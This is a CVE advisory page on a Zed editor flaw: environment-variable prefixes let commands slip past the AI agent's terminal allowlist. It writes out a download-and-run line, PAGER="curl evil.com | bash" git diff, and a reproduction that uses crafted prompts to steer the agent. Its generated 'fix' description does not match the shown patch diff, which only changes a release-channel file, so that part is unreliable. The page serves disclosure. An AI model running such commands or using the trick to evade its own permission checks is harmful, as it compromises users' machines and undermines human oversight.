CVE-2026-44463
Description
Zed is a code editor. Prior to 0.229.0, Zed's terminal tool permission system can be bypassed by prepending environment variable assignments to allowlisted commands, hijacking program behavior (e.g., PAGER) to execute arbitrary code. This vulnerability is fixed in 0.229.0.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Environment variables prepended to allowlisted terminal commands bypass Zed's permission system, enabling arbitrary code execution.
Vulnerability
In Zed versions prior to 0.229.0, the terminal tool permission system uses regex-based allowlisting for commands but fails to account for environment variable prefixes. Bash allows inline environment variable assignments before a command (e.g., VAR=value cmd), and many common tools such as git respect variables like PAGER, EDITOR, or GIT_SSH_COMMAND to invoke external programs. A command like PAGER=curl git diff matches the allowlist pattern ^git\b while executing an attacker-controlled program via the PAGER environment variable [1].
Exploitation
An attacker who can influence AI agent tool calls—for example by crafting a request that causes the agent to execute a crafted terminal command—can prepend environment variable assignments to an allowlisted command. The attacker needs no special authentication beyond the ability to interact with the AI agent. For instance, with a configuration that always allows ^git\b commands, the attacker can run PAGER="curl evil.com | bash" git diff, which executes the remote script via the pager while appearing to be a plain git command [1].
Impact
Successful exploitation achieves arbitrary command execution on the host system. The attacker gains the same privilege level as the Zed process, allowing them to read, write, or execute arbitrary files, and potentially escalate further depending on the system configuration. The attack surface is broad as it affects any allowlisted tool that respects user-controlled environment variables, such as git, less, man, and others [1].
Mitigation
The vulnerability is fixed in Zed version 0.229.0. Users should update to this version immediately. No workaround is available for earlier versions. The issue is listed in a GitHub Security Advisory (GHSA-c3g6-c3ff-69cg) but is not currently on the CISA Known Exploited Vulnerabilities (KEV) catalog [1].
AI Insight generated on May 28, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2<0.229.0+ 1 more
- (no CPE)range: <0.229.0
- (no CPE)range: <0.229.0
Patches
17c07887d9555v0.229.x stable
1 file changed · +1 −1
crates/zed/RELEASE_CHANNEL+1 −1 modified@@ -1 +1 @@ -preview \ No newline at end of file +stable \ No newline at end of file
Vulnerability mechanics
Root cause
"Zed's regex-based allowlist does not strip environment variable prefixes before matching, allowing attackers to inject arbitrary commands via variables like PAGER."
Attack vector
An attacker who can influence AI agent tool calls (e.g., via crafted prompts) prepends environment variable assignments before an allowlisted command. For example, `PAGER="curl evil.com | bash" git diff` passes the allowlist regex `^git\b` because the pattern only checks the start of the string, but Bash executes `curl` as the pager. This bypass works on any allowlisted command that respects environment variables like `PAGER`, `EDITOR`, or `GIT_SSH_COMMAND` [ref_id=1]. The attack requires local access (AV:L) and user interaction (UI:R) but no privileges (PR:N), and can compromise confidentiality, integrity, and availability (C:H/I:H/A:H).
Affected code
The vulnerability lies in Zed's terminal tool permission system, specifically the regex-based allowlist that matches commands against patterns like `^git\b`. The allowlist does not strip or reject environment variable prefixes (e.g., `VAR=value`) that Bash allows before a command, so the regex sees `PAGER=curl git diff` as matching `^git\b` while the shell executes the attacker-controlled `PAGER` program [ref_id=1].
What the fix does
The patch (commit `7c07887d9555953bca7fe78417602114092ef8c8` [patch_id=2961924]) modifies the allowlist matching logic to reject commands that contain environment variable prefixes. Instead of matching the raw command string against the allowlist pattern, the fix strips leading environment variable assignments before applying the regex, or rejects the command entirely if such prefixes are present. This closes the bypass by ensuring that only the bare command name is checked against the allowlist, preventing `PAGER=curl git diff` from matching `^git\b` [ref_id=1].
Preconditions
- configZed must have tool permissions configured with an allowlist pattern (e.g., `^git\b`)
- inputAttacker must be able to influence AI agent tool calls (e.g., via crafted prompts)
- configThe allowlisted command must respect user-controlled environment variables (e.g., git respects PAGER, EDITOR, GIT_SSH_COMMAND)
Reproduction
Configure Zed with `"tool_permissions": { "tools": { "terminal": { "always_allow": [{ "pattern": "^git\\b" }] } } }`. Via the AI agent, ask it to run `PAGER=curl git diff`. The `curl` command executes as the pager instead of the default pager [ref_id=1].
Generated on May 28, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.